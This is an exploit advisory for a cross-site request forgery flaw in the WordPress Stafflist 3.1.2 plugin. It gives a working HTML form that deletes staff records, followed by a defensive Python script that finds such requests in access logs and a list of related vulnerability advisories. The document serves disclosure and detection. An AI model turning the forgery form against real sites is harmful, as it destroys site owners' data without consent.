WordPress Stafflist 3.1.2 Cross Site Request Forgery

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

Packet Storm
# Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Summary:

A CSRF vulnerability exists in staff record remove functionality in WordPress Plugin Stafflist 3.1.2.

This vulnerability allows an attacker to delete existing records by triggering a CSRF HTML request, due to not validating wp_nonce token in the request.

# Exploit

As an authenticated user:

<html>
  <body>
    <form action="http://localhost:10003/wp-admin/admin.php">
      <input type="hidden" name="page" value="stafflist" />
      <input type="hidden" name="remove" value="1" />
      <input type="hidden" name="p" value="1" />
      <input type="hidden" name="s" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
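For triage on a site that ran the affected version, the following added example (not part of the advisory or the plugin) scans a combined-format access log for the remove request shape shown above and reports those whose Referer is absent or names another host. The function name, the sample log lines and the host intranet.example are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/Nginx "combined" access-log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def find_cross_site_removals(lines, site_host):
    """Return (timestamp, client_ip, remove_value, referer) for each Stafflist
    remove request whose Referer is absent or names a host other than site_host
    (pass site_host with its port if the site uses a non-default one)."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        query = parse_qs(url.query, keep_blank_values=True)
        # Request shape from the advisory: admin.php?page=stafflist&remove=...
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        if query.get("page") != ["stafflist"] or "remove" not in query:
            continue
        referer = "" if m["referer"] == "-" else m["referer"]
        if urlsplit(referer).netloc.lower() != site_host.lower():
            hits.append((m["ts"], m["ip"], query["remove"][0], m["referer"]))
    return hits

# Constructed sample log lines; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Feb/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=stafflist&remove=7&p=1&s=1 HTTP/1.1" 200 5120 "https://intranet.example/wp-admin/admin.php?page=stafflist" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Feb/2022:10:04:12 +0000] "GET /wp-admin/admin.php?page=stafflist&remove=1&p=1&s=1 HTTP/1.1" 200 5120 "https://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Feb/2022:10:09:30 +0000] "GET /wp-admin/admin.php?page=stafflist&remove=3&p=1&s=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Feb/2022:10:11:02 +0000] "GET /wp-admin/admin.php?page=stafflist HTTP/1.1" 200 8200 "https://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Feb/2022:10:12:45 +0000] "GET /wp-admin/admin.php?page=otherplugin&remove=9 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_cross_site_removals(SAMPLE_LOG, "intranet.example"):
        print(hit)
```

A missing Referer is a weaker signal than a foreign one, since browsers and Referrer-Policy settings can strip the header. The remedy for the flaw itself remains validating a nonce on the remove action.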

Related news

GHSA-773h-w45w-f2f9: Denial of service vulnerability exists in libxmljs

libxmljs provides libxml bindings for v8 javascript engine. This affects all versions of package libxmljs. When invoking the libxmljs.parseXml function with a non-buffer argument the V8 code will attempt invoking the .toString method of the argument. If the argument's toString value is not a Function object V8 will crash.

GHSA-7jvx-f994-rfw2: materialize-css vulnerable to cross-site Scripting (XSS) due to improper escape of user input

All versions of package materialize-css are vulnerable to Cross-site Scripting (XSS) due to improper escape of user input (such as <not-a-tag />) that is being parsed as HTML/JavaScript, and inserted into the Document Object Model (DOM). This vulnerability can be exploited when the user-input is provided to the autocomplete component.

GHSA-5hjh-c26m-xw8w: ProxyScotch is vulnerable to a server-side Request Forgery (SSRF)

ProxyScotch is a simple proxy server created for hoppscotch.io. Versions of the package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. It occurs when an HTTP request is made by a backend server to an untrusted URL submitted by a user. It leads to a leakage of sensitive information from the server.

GHSA-m2h2-264f-f486: angular vulnerable to regular expression denial of service (ReDoS)

AngularJS lets users write client-side web applications. The package angular after 1.7.0 is vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER_FORMATS.PATTERNS[1].posPre with a very high value. **Note:** 1. This package has been deprecated and is no longer maintained. 2. The vulnerable versions are 1.7.0 and higher.

CVE-2022-29444: WordPress Breeze plugin <= 2.0.2 - Plugin Settings Change leading to Cross-Site Scripting (XSS) vulnerability - Patchstack

Plugin Settings Change leading to Cross-Site Scripting (XSS) vulnerability in Cloudways Breeze plugin <= 2.0.2 on WordPress allows users with a subscriber or higher user role to execute any of the wp_ajax_* actions in the class Breeze_Configuration, which includes the ability to change any of the plugin's settings, including the CDN setting, which could be further used for an XSS attack.

CVE-2022-0191: Changeset 2705068 – WordPress Plugin Repository

The Ad Invalid Click Protector (AICP) WordPress plugin before 1.2.7 does not have a CSRF check when deleting banned users, which could allow attackers to make a logged-in admin remove arbitrary bans.
